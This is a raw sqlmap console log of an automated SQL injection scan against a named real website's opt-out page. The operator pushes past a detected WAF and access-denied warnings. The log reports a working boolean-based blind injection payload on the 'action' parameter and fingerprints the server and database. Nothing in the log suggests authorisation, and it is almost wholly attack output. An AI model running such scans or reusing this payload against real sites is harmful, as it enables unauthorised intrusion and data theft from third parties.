https://ondemand.webtrends.com/support/optout.asp?action=out
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.5.151#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:55:47 /2019-06-01/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[17:55:47] [INFO] testing connection to the target URL
[17:55:48] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://optout.webtrendslive.com/optout.asp?action=out&redirectPage=http%3A%2F%2Fondemand%2Ewebtrends%2Ecom%2Fsupport%2Foptout%2Easp%3Faction%3Dout%26status%3Dcompleted'. Do you want to follow? [Y/n] Y
[17:55:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:55:50] [CRITICAL] WAF/IPS identified as 'Kona Site Defender (Akamai Technologies)'
[17:55:50] [WARNING] potential permission problems detected ('Access Denied')
are you sure that you want to continue with further target testing? [Y/n] Y
[17:55:50] [WARNING] please consider usage of tamper scripts (option '--tamper')
[17:55:50] [INFO] testing if the target URL content is stable
[17:55:51] [WARNING] GET parameter 'action' does not appear to be dynamic
[17:55:51] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[17:55:59] [INFO] testing for SQL injection on GET parameter 'action'
[17:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:56:10] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[17:56:17] [INFO] GET parameter 'action' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[17:56:20] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite' 
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[17:56:20] [INFO] testing 'SQLite inline queries'
[17:56:20] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[17:56:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[17:56:20] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[17:56:20] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[17:56:20] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[17:56:20] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
[17:56:21] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
[17:56:21] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)'
[17:56:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:56:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:56:22] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[17:56:24] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[17:56:25] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[17:56:27] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[17:56:29] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[17:56:30] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[17:56:32] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[17:56:33] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[17:56:35] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[17:56:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[17:56:36] [INFO] checking if the injection point on GET parameter 'action' is a false positive
GET parameter 'action' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 420 HTTP(s) requests:
---
Parameter: action (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: action=-4801' OR 3217=3217 OR 'OaIv'='lxex
---
[17:56:43] [INFO] testing SQLite
[17:56:44] [INFO] confirming SQLite
[17:56:44] [INFO] actively fingerprinting SQLite
[17:56:44] [INFO] the back-end DBMS is SQLite
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: SQLite
[17:56:44] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
[17:56:44] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 390 times
[17:56:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ondemand.webtrends.com'

[*] ending @ 17:56:44 /2019-06-01/

